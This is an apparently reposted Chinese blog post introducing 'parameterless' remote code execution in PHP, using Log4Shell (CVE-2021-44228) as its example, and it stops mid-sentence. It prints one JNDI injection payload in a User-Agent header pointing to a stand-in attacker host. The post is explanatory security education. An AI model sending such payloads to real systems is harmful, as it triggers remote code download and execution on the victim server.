自学内容网 自学内容网

【网络安全 | 代码审计】PHP无参数RCE

未经许可,不得转载。

无参数RCE

一般情况下,RCE需要通过传递特定的输入(如URL参数、POST请求数据、表单数据等)来触发漏洞并执行恶意代码。而无参数RCE是一种特殊的远程代码执行漏洞,它的特点是通过调用多个函数(或利用系统中已有的代码路径)来实现远程代码执行,而无需显式的参数。

例如,log4j2 漏洞(CVE-2021-44228)就是一个经典的无参数RCE示例:

在这里插入图片描述

https://blog.cloudflare.com/zh-cn/inside-the-log4j2-vulnerability-cve-2021-44228/

当请求头中的 User-Agent 被修改为如下内容时:

User-Agent: ${jndi:ldap://attacker-server.com/exploit}

日志框架会自动解析该用户代理头并执行外部服务器上


原文地址:https://blog.csdn.net/2301_77485708/article/details/142311330

免责声明:本站文章内容转载自网络资源,如本站内容侵犯了原著者的合法权益,可联系本站删除。更多内容请关注自学内容网(zxcms.com)!